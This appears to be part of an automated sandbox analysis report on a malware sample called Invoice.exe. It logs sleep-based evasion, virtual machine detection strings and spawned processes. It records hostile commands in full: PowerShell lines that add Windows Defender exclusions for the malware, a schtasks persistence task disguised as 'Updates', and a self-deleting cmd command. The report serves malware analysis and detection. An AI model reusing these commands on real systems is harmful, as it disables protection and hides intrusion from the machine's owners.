Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595061	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594942	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594736	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594420	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593610	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4856	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5024	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 4403	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 5407	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7264	Thread sleep count: 4856 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7428	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7244	Thread sleep count: 116 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7360	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7464	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7376	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599749	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599640	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598954	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598829	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598704	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598579	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598454	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598329	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598204	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598079	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597954	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597829	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597704	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597576	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597466	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597285	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597157	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597032	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596907	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596079	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595954	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595829	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595704	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595579	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595454	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595178	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595061	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594942	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594736	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594420	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593610	Jump to behavior

Source: Amcache.hve.12.dr	Binary or memory string: VMware
Source: Amcache.hve.12.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.12.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.12.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.12.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.12.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.12.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.12.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.12.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.12.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.12.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.12.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: RegSvcs.exe, 00000009.00000002.1498516571.0000000001546000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.12.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.12.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.12.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.12.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.12.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.12.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.12.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.12.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.12.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.12.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.12.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.12.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.12.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.12.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.12.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.12.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.12.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Invoice.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\Invoice.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Invoice.exe"
Source: C:\Users\user\Desktop\Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe"
Source: C:\Users\user\Desktop\Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Invoice.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Invoice.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HbxYXheklrhvR" /XML "C:\Users\user\AppData\Local\Temp\tmpE22E.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3

Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Users\user\Desktop\Invoice.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
